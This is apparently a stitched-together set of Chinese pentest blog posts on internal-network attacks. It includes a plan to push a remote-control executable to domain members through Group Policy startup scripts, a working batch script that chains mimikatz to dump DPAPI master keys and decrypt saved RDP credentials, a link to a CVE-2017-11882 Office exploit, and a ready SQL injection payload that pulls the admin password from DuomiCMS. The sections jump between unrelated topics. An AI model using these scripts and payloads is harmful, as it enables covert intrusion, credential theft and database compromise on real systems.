0x01 背景

内网渗透中，当控制到域控时，当然是再好不过，但如何控制成员机器或个人机呢，域管理员账号登录？太敏感，动作大；psexec,wmi…?杀软报毒，不要不信，亲身经历；

想要直接推送个远控，神不知鬼不觉的搞定成员；

那么问题来了，如何推送个exe？

0x02 研究

¶方法1

查找大量相关资料，都没有现成的方法直接下发exe，然而吐司竟然也没有，最后，锁定了组策略开机脚本

域成员登录时，执行域控提前部署好的bat脚本，通过此脚本，IPC连接到域控，copy文件，在成员上执行。

前言

【奇技淫巧】破解远程终端凭据，获取服务器密码

想必大家都看了这篇文章吧，土司12月推送的，非常好的破解方式，内网中能起到相当大的作用，相信不少人已经去实践了一遍，过程之繁琐真是让我们这些人望而却步。

我可不想每拿到一台内网机，都要重复的去做这么复杂的操作，而且每一个凭据都要做一遍。

对批处理不熟，花了几天时间，写了个bat，一键批量获取。

Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

@echo off
setlocal enabledelayedexpansion

echo.
echo [+] Start. Code by redn3ck.
echo.

set flag=0	REM 判断是否存在Credentials
for /f %%i in ('dir /a/s/b c:\Users\Administrator\AppData\Local\Microsoft\Credentials') do (
	if exist %%i (
		set file=%%i
		set flag=1
		echo !file!

		for /f "delims=: tokens=1,2" %%i in ('mimikatz.exe "dpapi::cred /in:!file!" "exit" ^| findstr guidMasterKey') do set guidMasterKey=%%j
		REM echo !guidMasterKey!

		mimikatz "privilege::debug" "sekurlsa::dpapi" "exit" > MasterKey.txt
			
		REM findstr /n 返回行号 example: 1:       * GUID      :  {b619a08d-f4c3-408d-b733-bc89bd94ca0b}
		for /f "delims=:" %%i in ('findstr /n "!guidMasterKey!" MasterKey.txt') do (
		set /a lineNum=%%i+1
		REM echo !lineNum!
		call :next
		)
	)
)
:end
if !flag!==0 echo [-] No credentials :(
echo.
echo [+] End
exit /b	

:next
for /f "skip=%lineNum% delims=" %%i in ('type MasterKey.txt') do (
set MasterKeyTemp=%%i
goto next2
)

:next2
set MasterKey=%MasterKeyTemp:~16%
REM echo %MasterKey%
mimikatz "dpapi::cred /in:%file% /masterkey:%MasterKey%" "exit" > pass.txt
findstr "TargetName UserName CredentialBlob" pass.txt
del MasterKey.txt

POC

https://github.com/embedi/CVE-2017-11882

如何使用，作者github里写的很清楚

附上自测gif

BTW

现在此漏洞被冠上全版本通杀的名号，作者也放出3个版本的视频，但我本地测试，却在2016下未成功

具体环境：win10 [10.0.16299.64] + 破解激活过的office2016

¶变量覆盖导致注入

1. 漏洞页面：\member\invitation.php

   1 2 3 4 5 6 7 8 9 10

   if($dm=='yq') { $ccgid=$_SESSION['duomi_user_group']; $ccuid=$_SESSION['duomi_user_id']; $cc1=$dsql->GetOne("select * from duomi_member_group where gid=$ccgid"); $ccgroup=$cc1['gname']; $cc2=$dsql->GetOne("select * from duomi_member where id=$ccuid"); $ccjifen=$cc2['points']; $ccemail=$cc2['email']; $cclog=$cc2['logincount'];

   $ccgid，$ccuid均无任何过滤直接带入查询，由于变量覆盖导致此处两个变量均可控制

   该cms采用80sec通用防注入，网上公开方法即可绕过。

   利用：来到member页面，随便注册一个用户,test,登入。

   1 2 3

   payload: http://127.0.0.1/duomicms_1.30/member/invitation.php _SESSION[duomi_user_id]=@`'` or updatexml(1, concat(0x7c, (select password from duomi_admin)), 3) and 1=@`'`&_SESSION[duomi_user_group]=1

   注出管理员密码